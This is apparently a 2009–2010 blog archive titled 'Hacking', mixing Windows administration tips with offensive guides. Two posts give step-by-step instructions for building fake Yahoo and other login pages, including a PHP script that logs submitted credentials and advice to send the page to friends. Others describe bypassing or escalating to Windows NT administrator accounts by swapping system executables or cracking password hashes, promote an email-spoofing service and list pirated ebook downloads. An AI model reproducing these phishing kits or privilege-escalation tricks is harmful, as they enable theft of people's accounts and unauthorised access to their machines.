Hacking

2010-01-14T20:44:00.000-08:00

LinkBunch - Put multiple links into one - http://linkbun.ch

LinkBunch lets you put multiple links into one small link which you can share over IM, Twitter, email or even a mobile phone SMS. Learn more about LinkBunch here.

Simply put in a list of links in the box below and click 'Bunch' to get your small LinkBunch link!

New Feature: Copy Bunch to Clipboard!

Enabling Remote Desktop on a Remote Machine

2009-12-01T11:23:00.002-08:00

What if you want to use Remote Desktop on a server that's already off-site? Here's how to do it.

You can access some properties pages of System using Computer Management by first connecting the console to a remote computer, then right-clicking on the root node and selecting Properties. Unfortunately however, the Remote tab is not available when you access System properties this way on a remote machine, so you can't enable Remote Desktop on a remote machine using this approach. But there's a workaround: start Registry Editor on your administrator workstation and select the Connect Network Registry option under the File menu. This opens the Select Computer search box. Either browse Active Directory to locate the remote server, or type its name in the textbox. Click OK and a node will be displayed in Registry Editor for the remote machine. Now browse HKLM on SRV to find the following Registry key: HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server. Under the Terminal Server key, you'll find a REG_DWORD value named fDenyTSConnection. Double-click on that value to open the Edit DWORD Value box and change the value data from 1 (Remote Desktop disabled) to 0 (Remote Desktop enabled). The remote machine needs to be rebooted for the change to take effect, so open a command prompt and type the following command: shutdown -m \\servername -r

After the remote machine reboots, Remote Desktop should be enabled on it. To test this from your workstation, open Start --> All Programs --> Accessories --> Communications --> Remote Desktop Connection, enter the name of the remote server in the Remote Desktop Connection logon box, supply your administrator password when prompted, and you're in.

Recover Lost Windows NT Administrator Password

2009-12-01T11:23:00.001-08:00

This tip is in the Administrators section. Use this information at your own risk. Any attempt to circumvent an OSs normal security can be disastrous. If you are really, really stuck - this tip may be for you. No warranty is suggested or implied. I have used some of these tools. Sometimes successfully and sometimes not. Those that attempt to overcome Syskey, in particular, seem risky. I have had the most success with the Linux boot disks and a manual brute force dictionary attack using L0phtcrack. These are do-it-yourself tools. There is something to be said for the comfort level of the commercial tools. Consider ElcomSoft for a commercial approach.

If you are interested in these tools or procedures, I suggest download the code and print the procedures now (I have had to remove dead links from this page more than any other - this kind of data seems to disappear fast).

This article kicked off my interest in Penetration Testing. In particular, depending on what you are searching for, you may want to check on my Penetration Testing Tip #12: Password Recovery Resources tip. For core security issues see Wayne's Security Resources.

If your organization has not brought in a team to do a full scope penetration test, you really have no idea how insecure and vulnerable your network really is to internal and external hackers. I guarantee that you will be shocked but its a better security practice to make penetration testing part of your yearly risk analysis than to wait until you have a real incident. Given my experience as an NT systems admin and my experience hacking just such an environment, I will be writing white papers to help the NT admin protect his/her *ss. A critical resource is the administrator's workstation. I strongly recommend you read my paper on how to protect this resource.

There are various offline attacks. Do you have auditing turned on so you can detect when a server has been turned off? Making it vulnerable to offline attacks. If you are not aware of it:

Without physical security, there can be no security.

If you have a resource which needs to be protected, the single most important protection is to restrict physical access.

Easiest: Linux boot disks

There are Linux boot disks that have DOS and NTFS filesystem drivers and software that will read the registry and rewrite the password hashes for any account including the Administrators. It is as simply as:

shutdown or turnoff the PC
put the book disk in the PC and reboot
respond to the Linux prompts
the highest barrier is understanding unix media descriptors
select the account whose password hash needs to be rewritten & enter a new password
reboot & access using the new password

This process requires physical access to the console and an available floppy drive.

The following site provides the downloadable boot disk image, image to disk utility, source code, and supporting documentation: Offline NT password utility. This version can disable syskey protect. They do note that turning off syskey under Windows 2000 damages the SAM and is not to be attempted except as a last resort to reinstallation. Watch for updates.

See Analysis of Alleged Vulnerability in Windows 2000 Syskey and the Encrypting File System for Microsoft's perspective.

I have seen the Linux boot disks fail primarily on scsi-based boxes when the boot disk did not have the proper scsi driver or when there was some problem detected in the scsi setup. I have also seen PCs where the Linux boot disk works but the SAM seems to be invisible to Linux (although its in its standard location and later access with NTFSDOS allows it to be copied).

What would raise barriers to these types of tools?

Lock the PC up.
Recognized requirement for servers. How many workstations are behind locked doors? Given what you have learned here, shouldn't at least a select set of workstations be secured? Say the officers, personnel, security personnel, ...
Power on passwords.
A decent barrier. There are physical hacks. Are the cases locked?
Set BIOS to boot from HD and not from floppy
Raises the barrier a little.
Remove the floppy and lock the case - higher barrier. For a high security environment. Would this fly where you work?
Apply Microsoft's syskey to encrypt the hashes. See atips92. Syskey stymies the freeware Linux offline attacks at this point in time. Some of the commercial products state they can reset the password even if Syskey has been applied.
Encrypt the hard drive. There are commercial products to do this. NT2000 includes encryption as an NT feature similar to NT4's NT compression feature. None of the methods I am aware of at this time will work under NT2000, even without the encrypting file system feature.

It is not practical in most environments to have high security applied to workstations. But one or more of the less intrusion barriers would increase the time to break in and would increase the probability of exposure to the hacker. This would increase the probability of management acceptance of usage of these tools by legitimate support personnel trying to solve a difficult problems.

Some of the Linux boot disk utility variants leave a footprint. The password is changed. Some include backup/restore features for the sam. With this feature, one could boot a Windows NT PC; backup the sam data; overwrite the pw; reboot; login using the compromised account and do mischief including sending inappropriate email or deleting bits and pieces here and there - darn those unreliable PCs; restore the sam and the owner's pw; since the attack was offline, unless the shutdowns are monitored, the episode is essentially invisible.

The automated nature of these tools makes this available to putzes, baby hackers, and the guy/gal in the office next door. It took me 5 minutes with a very simple search to find the utilities and procedures documented on this page. The security by ignorance barrier is incredibly low.

The level of expertise to take advantage of physical access does vary. These baby tools for NT should make one seriously consider how to improve server and workstation security. Server physical security is generally good except in departmentally distributed servers. Workstation security is a nonentity in all but the most paranoid shops. These tools should give one pause, a act to protect your officers and other PCs with highly sensitive data from hackers.

Sunbelt released NTAccess which can replace the administrator password of a Windows NT; Windows 2000 system with or without Active Directory; or XP. It can bypass syskey protection. NTAccess can replace the administrator password of a Windows XP, Windows NT or Windows 2000 system by rebooting the computer with a special set of boot disks or CD-ROM (XP only). This is useful if you forgot the administrator password and cannot access the Windows XP/2000/NT system.

AccessData are in the business of password recovery and sell toolkits which can reset the administrator password under Netware and NT as well as office and personal application products such as Word and Quicken. They provide technical support should things go awry. Given the consequences of problems, tech support can be worth every penny. They also have a set of freebies utilities.

The Passware Kit also offer a fairly extensive password recovery suite including NT and many applications fairly inexpensively. They have recently announced a version of their product to reset Administrator password, secure boot password or key disk if lost: Windows 2000 password product with the following features:

100% recovery rate
Windows XP Home and Professional Editions are supported
Windows 2000 Professional, Server and Advanced Server are supported
Windows NT Workstation and Server 3.50, 3.51, 4.0 are supported
Loads third party mass storage (SCSI, RAID, etc.) drivers when using Windows XP, 2000 or NT 4.0 setup disks
All secure boot options are supported
All Service Packs are supported

WInternals offer NTLockSmith to reset lost NT passwords. It only works in conjunction with NT Recover which is designed to recover data from damaged NT boxes. It sounds much like the Linux solution but uses NT Recover to get to the registry of the target NT box. I suggest you take a close look at their admin tools. Their product is Windows 2000 compatible.

Dieter Spaar's NTAccess uses boot disks to access the NT / Windows 2000 system and change the administrator password. It can turnoff Syskey protection at the cost of the loss of all passwords except the administrators account which it resets. My guess is that they achieve this by deleting the LSA SecureBoot value and replacing the Administrator's password hash. They are not breaking the encryption. Just are turning it off. See my Syskey tip for more information.

Many sites document a rather complex method of resetting the administrator's password. The method takes advantage of the fact that certain system services, such as the spooler, operate under the security context of the local system. By changing the file name of the spooler to another executable it is possible to launch an application with privilege to change password. There are several versions. They work. They are complex. They have the advantage that they do not appeal to hackers - take too long - too much danger of exposure. This technique has the disadvantage that there must be enough space to install another copy of NT. This method is documented : here, here, here, and many other locations.

Some take a much more direct approach. This is actually a method to escalate a user's account to admin level. If you have another account on the box, even though it is not admin, lets say account manager or backup account, you can log onto the system, rename spoolss.exe to spoolssbak.exe, rename usrmgr.exe to spoolss.exe, reboot. When you logon after reboot, User Manager will be running in the foreground running as localsystem. This gives you the ability to reset the admin password to whatever you want, or to create an new admin account for example. You need to logoff and back on using the administrator command to get the renamed files back under their proper names.
Note: for NT workstation, User Manager is musrmgr.exe.

kira bomba states

       I have found out that this method (as described above) doesn't work
      on a Windows 2000 box. However, you can make it work if you consider
      the following:
     
      1. It happens that you can't delete the "spoolsv.exe" (win2000 version
      of "spoolss.exe") file from your harddisk (usually it's in the
      \winnt\system32 directory). This file is loaded on start-up and can't
      be stopped using the Task Manager. As long as you can't stop the
      corresponding process, you can't delete the file, it's locked by the
      operating system. Even if you find a way to stop the process you can't
      delete or substitute the file, Windows will automatically replace it
      with the default version.

      A solution to this problem is to delete the file "offline", i. e. after
      booting from a DOS floppy. If the harddisk is FAT formatted it will work
      out just fine. If the harddisk is NTFS formatted you'll need a NTFS driver,
      like NTFSDOS Pro, downloadable from
      www.sometips.com/goodstuff/default.htm.
      When you have booted from  a floppy it's no problem any more to delete
      "spoolsv.exe" or to replace it. Replace with what? In Windows 2000, there
      is no "usrmgr.exe" nor "musrmgr.exe". Well, compile the following C program,
      name it "spoolsv.exe" and put it to where the original file was:

       *****************
       #include 

       int main(void)
        {
         system("control userpasswords");
         return 0;
        };
      *****************
      "mmc lusrmgr.msc" instead of "control userpasswords" should work too. When you
      start Windows next time, as a normal user or as an admin, the User Manager
      window will open...

Another technique reported on the web which requires a 2nd copy of NT :

Install an alternate copy of Windows NT.
Boot up the alternate install.
Use Start / Control Panel / System / Startup to change the default boot instance to your original install.
In the original Windows NT folder, navigate to the \System32 sub-folder.
Save a copy of logon.scr, the default logon screen saver.
Delete logon.scr.
Copy CMD.EXE to logon.scr.
Shutdown and restart your original install.
Wait for the logon screen saver to initiate. It will actually open a CMD prompt, in the security context of the local system account. Be patient, it sometimes takes several minutes for the command window to popup.
Type MUSRMGR, into the CMD prompt to execute User Manager, and reset the Administrator's password.
Delete the logon.scr from %SystemRoot%\System32.
Rename the saved default screen saver back to logon.scr.

If you have an old ERD from when you knew the admin password, you could use it during a Windows NT repair install to get back to that point. Just be careful, any accounts created since that point will be lost and those not lost will have their passwords reset to an old version.

A method involving removing the HD and placing it in another NT box as an additional drive, is documented here . This approach normally works when nothing else will in most OSs not using encrypting file systems. Guess whether I have tried this approach. Not in NT.

If you have access to current ERD disks or the repair directory, you can use L0phtCrack to access the password hashes and perform a brute force attack on the password hashes. It will break any password (it may take a day or two). L0phtCrack has the advantage that it does not modify the passwords. Additionally in another context, a run by the administrator against the password hashes using a simple dictionary will give you an idea if your users passwords are too weak. See ElCOM for dictionaries that you can download as well as a significant suite of password breaker software.

L0phtCrack can be used as an offline method:

Create an DOS bootable floppy
If NT is installed as a FAT partition, use the DOS boot disk to copy the SAM, winnt\system32\config\sam
If NT is installed on NT, use NTFSDOS.EXE to get the SAM.
Copy the SAM to a temp directory on a working NT box
Use pwdump to pull out the hashes and break them with l0phtcrack.

See atips174 if you are unfamiliar with NTFSDOS.EXE.

If you need to break a password set by an application or perhaps a password for zipped files, see these sites:

www.passwordservice.com/
www.lostpassword.com
www.elcomsoft.com
www.soft4you.com
www.pwcrack.com
Microsoft Office pw crackers

These sites were just a few I am aware of. There are many. Unfortunately, as this article should make you aware of, passwords can give one a false sense of security when its all you have protecting your a$.

As an aside, if you have Win9x and have set a password and forgot it, you can bypass Windows with F8 during startup and choose the Command Prompt Only option. At the prompt, go to the Windows directory and delete .pwl files. No password will be required on the next boot. A new password can be set if you wish at the Start|Settings|Control Panel|Passwords and click on Change Windows Password.

CMOS/BIOS password info:

PC BIOS Security and Maintains Toolkit
Cracking Programs
Forgotten Password Utilites

Microsoft has reprint a Windows NT Magazine background article on Where Windows NT Stores Passwords.

Microsoft's Administration Tools for Windows 2000

2009-12-01T11:23:00.000-08:00

Microsoft provides a fairly comprehensive set of tools for administrators. I would call some of these tools and some services. Some are integral to NT and W2K like Event Viewer. The tools are:

Tool	Description
Active Directory Domains and Trusts	administer domain trusts, change domain mode, add and change user principal name suffixes
Active Directory Sites and Services	establishes and administers sites, replication, and security services
Active Directory Users and Computers	manages users, computers, and groups within a domain
Certification Authority	manages certificate services which issues certificates for public key security
Cluster Administrator (advanced server only)	handles the configuration of clusters and nodes
Component Services	configures and administers COM components and apps
Computer Management	administers disks, shares, users, groups, and services on the local computer
Configure Your Server	sets up and configures windows services
Connection Manager Administration Kit	manages and customizes local and remote connections
Data Sources	adds, removes, and configures ODBC databases and drivers
DHCP	manages DHCP services
DHCP	manages DHCP services
Distributed files system (DFS)	manages DFS installations, topology, and replication
DNS	manages DNS services
Event Viewer	display application, security and system logs
Internet Authentication Service	configures security and authenication for dialin users
Internet Services Manager	manages IIS
Licensing Manager	manages client licenses
Local Security Policy	views and configures user rights, audit policy, and misc security settings applicable to local computer
Network Monitor	captures network data for analysis
Performance Monitor	views system performance graphs and configures performance logs and alerts
QoS Admission Control	Quality of Service: assign network bandwidth by subnet
Remote Storage	manages the storage of infrequently accessed files
Routing and Remote Access	administers dialup, vpn, and internetwork connections
Server Extensions Administrator	manages Front Page server extensions
Servies Manager	start, stop, and configure services
Telephony	manages telephony clients and servers
Telnet Server Administration	start, stop, and provide info about Telnet server
Terminal Services Client Creator	make floppy disks for installing Terminal Services client software
Terminal Services Configuration	configures new connections for Terminal Services; modifies and deletes existing connections
Terminal Services Manager	display terminal servers in trusted domains
WINS	adminster WINS

Most admins want to run these tools from their W2K workstation. Open the i386 folder in the W2K server CD and double-click Adminpak.msi. This will start the Administration Tools Setup Wizard which you can use to install or remove admin tools. This version of the Admin tools will not install under XP. The .NET version of Adminpak.msi will. You can download the beta3 version of the Windows XP Administration Tools Pack .

Check If A Single User Can't Log On To Domain? and Active Directory Remote Admin Scripts

2009-12-01T11:06:00.000-08:00

What To Check If A Single User Can't Log On To Domain?

Explains the tips you can use to troubleshoot the problem for a user who can't log on to the domain.

Sometimes a single user might be not able to log on to domain. You can follow the checklist given below:

Make sure:

You can ping the domain controller from the user's computer.
There is no white space in the User's Home Profile in User's Property > Check it using the DSA.MSC.
The user computer is configured with the correct DNS Server to find the domain controller > Check in TCP/IP property of the user's computer.
The Computer Account in the domain for the user's computer is not missing > Check using the DSA.MSC
The Computer Account in the domain is not disabled > Check using the DSA.MSC
The Time between the domain controller and the client computer is synchronized > Check using Net Time command.
The Domain Controller can be found > Check environment variables and check "LOGONSERVER" value or execute Nltest /DsGetDc:domain to re-locate the domain controller for the user.

Active Directory Remote Admin Scripts

The Windows 2000 Resource Kits include vbs scripts to aid in Active Directory remote administration. They include:

chkusers.vbs : searches a domain for a user with specific properties or attributes.
createusers.vbs : create new users.
group.vbs : returns list of the groups contained within a specific domain.
groupdescription.vbs : returns description assigned to a specific group.
listdcs.vbs : returns list of all domain controllers in a domain.
listdomains.vbs : returns list of all domains in a namespace.
listmembers.vbs : returns list of all members of an Active Directory group.
listprinters.vbs : returns list of all printers and their properties for a specified server.
modifyldap.vbs : control LDAP admin policies.
modifyusers.vbs : modifies multiple user accounts on a domain or system.
schemadiff.vbs : compares schema between two forests.
systemaccount.vbs : returns config info for system account on a system.
useraccount.vbs : returns info contained within a user account.
usergroup.vbs : add or remove multiple users from a group.

Modify Logon Rights On Multiple Computers

2009-12-01T11:04:00.000-08:00

To Get A List Of Security Groups A User Belongs???

Explains a simple command you can use to modify the "Log On Locally" rights on all the server remotely.

Log On Locally rights allows your users to log on locally on the server. By default, all the users in the Active Directory Forest are able to log on to any server except domain controllers. The Local Users Security Group is added to the "Allow Log On Locally" rights on local server and this security group contains the Domain Users security local group. If you have created a security group and want to allow only the members of this Security Group should be able to log on locally on specified servers then you must do it manually, using a Group Policy or using a script.

In this example, I have created a domain security group named: RDP Access and members of this security group should be able to log on locally on 100 servers out of 500 servers in my environment.

Steps:

Create a text file: Servers.txt
Copy all the 100 server names in this text file.
Run the following command:

For /F "Tokens=*" %a in (Servers.txt) Do Ntrights.exe -m \\%a -u "Domain_Name\RDP Access" +r SeInteractiveLogonRight

The above command will assign the Log On Locally rights to RDP Access which is a domain local security group on the servers mentioned in the Servers.txt file.

Check If Servers In DMZ Are Up and Running Or Pinging

2009-12-01T10:35:00.000-08:00

How To Check If Servers In DMZ Are Up and Running Or Pinging?

Explains the steps you have use to make sure the Servers in the DMZ are pinging from a Desktop computer which is running out of the DMZ.

The servers in DMZ are protected by the firewall. The firewall rules are used to block any incoming traffic such as ICMP. ICMP is used by the Ping utility. So you can not ping a server from your desktop.

You have a desktop computer which is out of DMZ. You have a task assigned to you which involves pinging all the servers in the DMZ to make sure they are up and running. As a manual process, you will log on to a server (generally called a Management Server) in DMZ and then check all the servers one by one or run a Ping Script which will show you the results in a text file. What if you want to check the connectivity from the Desktop computer? In this situation, you can use a simple command to process the Ping from within the DMZ's Management Server. This is how you do it:

Steps:

Create a text file by name ServersDMZ.txt
Copy all the server names in the text you created and then save it.
Run the following command from your "desktop" on a Server in DMZ from which all other servers in the DMZ are reachable.

For /f "Tokens=*" %a in (ServersDMZ.txt) do Psexec.exe \\ManagementServer Ping %a > Results.txt

The above command will run on a Management Server running in the DMZ and then check the connectivity of all the Servers specified in the ServersDMZ.txt.

Remote Desktop with Windows XP

2009-12-01T08:58:00.000-08:00

What is Remote Desktop?

With the Remote Desktop feature in Windows XP, you can remotely control a computer from another office, from home, or while traveling. This allows you to use the data, applications, and network resources that are on your office computer, without being in your office. In the Illustration below, you can see that an Systems Administrator can quickly (and securely) get into their corporate offices and do that, system down, no problem, you can fix from anywhere you can find an Internet connection that is stable enough to let you work.

Remote Desktop is the new name for the older Windows based Terminal Services Client that (like with Windows 2000), would allow you to connect to and manage a server remotely for up to two connections, allowing you to do maintenance on the server and so on. Remote Desktop (Windows Server 2003 / XP), allows the same functionality, except it's enhanced and easier to use.

To use Remote Desktop, you need the following:

Windows XP Professional installed on your office computer, or whichever computer you plan to operate remotely. This computer is known as the host. This article was written using Microsoft’s most current operating system – Windows XP Professional.
Display data and keyboard data are sent over a WAN or Internet connection so make sure that you are working over a good connection… to use Remote Desktop over a slow connection could be a burden. It will work, but it may not respond as well as you would like. You can use low bandwidth connections, it will allow you to remotely control a system.

Get Remote Desktop

The Remote Desktop Connection software is pre-installed with Windows XP so to verify that you have it, use the following URL:
- Start => All Programs => Accessories => Communications, => Remote Desktop Connection
If you don’t have it, then you need to get it. There are options. First, you can get the Remote Desktop Connection software on the Windows XP Professional and Windows XP Home Edition product CDs
If you don’t have a CD, then you can get it online. Use the links I provided in the links and references section to get the clients if you don’t have it currently available on your system.

The Remote Desktop Connection software can be installed on any supported Windows platform. One you get it, install it and open it up.

Let’s look at how install Remote Desktop (if not already installed)

Install the Client Software

To install Remote Desktop Connection software on a client computer

Insert the Windows XP CD into your CD-ROM drive.
When the Welcome page appears, click Perform additional tasks, and then click Setup Remote Desktop Connection as shown below.

When the installation wizard starts, follow the directions that appear on your screen.
You will have to agree to the license agreement

Enter your personal information and click Next
Finish the installation and you will now have Remote Desktop Installed on your XP system.

Enable Your Computer as the Host

Before you use Remote Desktop, your systems have to be set up properly to allow it to be ‘controlled’. One of the first things you will need to do is to ‘enable’ the remote control of a system. To do that, you will need to make a quick setting change in the System Properties.

Log in as an Administrator (or as a member of the Administrators group)
Open the System Applet in the Control Panel.
Click Start => Control Panel => System Applet => Remote Tab

On the Remote tab, select the Allow users to connect remotely to this computer check box, as shown below.

Make sure that you have the proper permissions to connect to a computer remotely, and click OK.

Remote Desktop and XP Service Pack 2

If you're running Windows XP Service Pack 2 (SP2) and you enable Remote Desktop, Windows Firewall will be automatically configured to allow Remote Desktop connections to your computer. There is one exception; this will not happen unless you have the Windows Firewall configured to allow no exceptions.

To allow exceptions in Windows Firewall:

Open the Control Panel, Double Click the Security Center applet

When the Security Center opens, Click on Windows Firewall

Make sure you Clear the check box next to “Don't allow exceptions”

Start a Session

Once you have enabled your Windows XP Professional computer to allow remote connections, and installed client software on a Windows-based client computer, you are ready to start a Remote Desktop session.

Remember, as I laid out in the diagram in the beginning of this article, you must first establish a virtual private network (VPN) connection or remote access service (RAS) connection from your client computer to your office network. Without a connection ‘into’ the corporate network, you will not be able to remote a server, especially if its not internet facing *like on a DMZ* and using a private RFC 1918 address.

To create a new Remote Desktop Connection

Open Remote Desktop Connection.
Click Start => All Programs => Accessories => Communications => Remote Desktop Connection
In Computer, type the computer name or TCP/IP (shown below) address of the host you want to control… remember, they have to be ‘allowed’ to be controlled first.
Fill in your credentials, Domain if needed, save the connection as a ‘profile’ so you can quickly go back to it later and use it again.

I don’t recommend checking the ‘Save my password’ check box because if your system becomes compromised, your servers (or other systems) have now become exposed to the Hacker. Now in the server, the whole corporate network is potentially exposed.
Once you have put in your credentials and all other pertinent information, Click Connect.
Your request will now be sent to the system you want to connect to. The Log On to Windows dialog box appears.
In the Log On to Windows dialog box, type your user name, password, and domain (if required), and then click OK.
The Remote Desktop window will open and you will see the desktop settings, files, and programs that are the system. The system that is in the corporate network can remain locked and safe while you are now inside it, working on it. Whatever you are doing cannot be seen by someone watching the console.
Problems do occur, most commonly it’s just that the connection is either refused or it timed out because of latency. Here is a commonly seen error message:

Note:
To change your connection settings, (such as screen size, automatic logon information, and performance options), click on the other tabs available when you open the Remote Desktop Client.

To open a saved connection

Saved connections are stored in you’re my Documents folder
Windows Explorer => My Documents folder
Click the .Rdp file for the connection you want to use

A Remote Desktop file (*.rdp) file is a profile that holds a bunch of settings. You can make copies of them as you would any other file and just change the options internally to that profile and save it with another name. You can copy all the *.rdp files and store them in a folder on your desktop; you can even edit the Start Menu and make a folder called RDP with all your profiles in it. Whatever makes it easy for you to manage…

To edit an *.rdp file and change the connections settings it contains, right-click the file and then click Edit.

To log off and end the session

In the Remote Desktop Connection window => click Start => Shut Down.
The Shut Down Windows dialog box appears
In the drop-down menu, select Log Off => click OK

Hack yahoo login

2009-11-30T13:13:00.000-08:00

Hack yahoo using fake login page - Procedure

STEP 1.
Go to the Yahoo login page by typing the following URL.

mail.yahoo.com

STEP 2.

Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

STEP 4.
Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”

Rename the above link into

src=”files/ma_mail_1.gif”

Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

STEP 6.
Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

STEP 7.
Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP

Tip: 110mb.com supports PHP

STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.

STEP 9.
Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
here is the login script which i am posting due to large number of requst

header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

Phishing

2009-11-30T12:12:00.000-08:00

1. First things first you must choose the site which you wanna make a phisher from.
-
2. When you found your site right click on it and say "view source" and save it on desktop as index.htm
-
3. Open the "index.htm" with notepad and find search the source for the word "action=". you should find a command looking like this

or anything alike and probably more inside like "id=" and "autocomplete=".
-
4. change the url (in this case "RANDOM URL") to "write.php"
-
5. If the method is "post" then change it to "get"
-
5. Save index.htm
-
6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of http://www.700megs.com. Create a free website.
-
7. login to your website and go to "file manager"
-
8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)
-
9. Create a new file called "write.php" and copy / paste this:
-
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?

>

10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: http://hotmail.com ");
you might want to change the textfile name so others wont be able to view the file.

11. Save this file (write.php), and upload it to the subdomain aswell

13. test out your website. type in something in your phisher and then go to filemanager and open the password file, what you wrote should be typed here!, you can also access the password file by going to http://www.yourdomain.700megs.com/passwordfile.txt

Send email from anyone's email address to anyone

2009-11-30T11:44:00.000-08:00

Send email from anyone's email address to anyone

www.fakemail.co.tv

Anonymous Mailer For OUG

Ethical Hacking EBooks

2009-11-26T15:38:00.000-08:00

Hacking Exposed- :-
One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.

Download Link:-

http://www.insecure.in/ebooks/hacking_exposed_5.rar

Internet Denial Of Service :-
Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.

Download Link:-

http://www.insecure.in/ebooks/internet_denial_of_service.rar

Computer Viruses For Dummies
It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book’s value price and compact size will make it irresistible to people who need to protect their home PC or network.

Download Link:-

http://www.insecure.in/ebooks/computer_viruses_for_dummies.rar

Hackin9 :-

This book will help you learn :-
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.

Download Link:-

http://www.insecure.in/ebooks/dangerous_google_searching.rar

Hack Attacks Testing:-

A network security breach (a hack, crack, or other invasion) occurs when unauthorized access to the network is achieved and havoc results.
The best possible defense is an offensive strategy that allows you to regularly test your network to reveal the vulnerabilities and close the holes before someone gets in.
Written by veteran author and security expert John Chirillo, Hack Attacks Testing explains how to perform your own security audits.

Download Link:-

http://www.insecure.in/ebooks/hack_attacks_testing.rar

Secrets Of A Super Hacker
Here is the most amazing book ever published on computer hacking. Step-by-Step illustrated details on the techniques used by hackers to get your data including :-
Guessing Passwords, Stealing Passwords,
Password Lists, Social Engineering,
Reverse Social Engineering,
Crashing Electronic Bulletin Boards,
Dummy Screens, Fake E-mail,
Trojan Horses, Viruses, Worms,
Trap Doors, And Much more.
Anyone concerned with computer security and data privacy needs to read this book.

Download Link:-

http://www.insecure.in/ebooks/secrets_of_super_hacker.rar

Hacking GMail

Everything about GMail including :-
Inside GMail, Conquering GMail, Desktop Integration, GMail Power Tips, Skinning GMail, How GMail Works, GMail & Greasemonkey, GMail Libraries, Building API, Using GMailFS, etc

Download Link:-

http://www.insecure.in/ebooks/hacking_gmail_2007.rar

Stealing The Network:-

How to Own a Shadow is the final book in Syngress ground breaking, best-selling, Stealing the Network series. As with previous title, How to Own a Shadow is a fictional story that demonstrates accurate, highly detailed scenarios of computer intrusions and counter-strikes. Readers will be amazed at how Knuth, Law Enforcement, and Organized crime twist and torque everything from game stations, printers and fax machines to service provider class switches and routers steal, deceive, and obfuscate. From physical security to open source information gathering, Stealing the Network: How to Own a Shadow will entertain and educate the reader on every page. The books companion Web site will also provide special, behind-the-scenes details and hacks for the reader to join in the chase for Knuth.

Download Link:-

http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar

Network Security:-

Cisco Press(March 19, 2008) CCIE Professional Development Series Network Security Technologies and Solutions
Network Security Technologies and Solutions is a comprehensive reference to the most cutting-edge security products and methodologies available to networking professionals today.
This book helps you understand and implement current, state-of-the-art network security technologies to ensure secure communications throughout the network infrastructure.
This book is part of the Cisco CCIE Professional Development Series from Cisco Press, which offers expert-level instruction on network design, deployment, and support methodologies to help networking professionals manage complex networks and prepare for CCIE exams.

Download Link:-

http://www.insecure.in/ebooks/net_security_tech.rar

Hacker's HandBook :-
This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screen shots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications. The topics covered include bypassing login mechanisms, injecting code, exploiting logic flaws and compromising other users. This handbook describes a proven methodology that combines the virtues of human intelligence and computerized brute force, often with devastating results.

Download Link:-

http://www.insecure.in/ebooks/webapp_hackers_handbook.rar

Vulnerability Management :-
Get all the Facts and See How to Implement a Successful Vulnerability Management Program. As a business owner, or someone responsible for network security within your organization, you need to understand how to prevent attacks and eliminate network weaknesses that leave your business exposed and at risk.
Vulnerability Management for Dummies arms you with the facts and will help :-
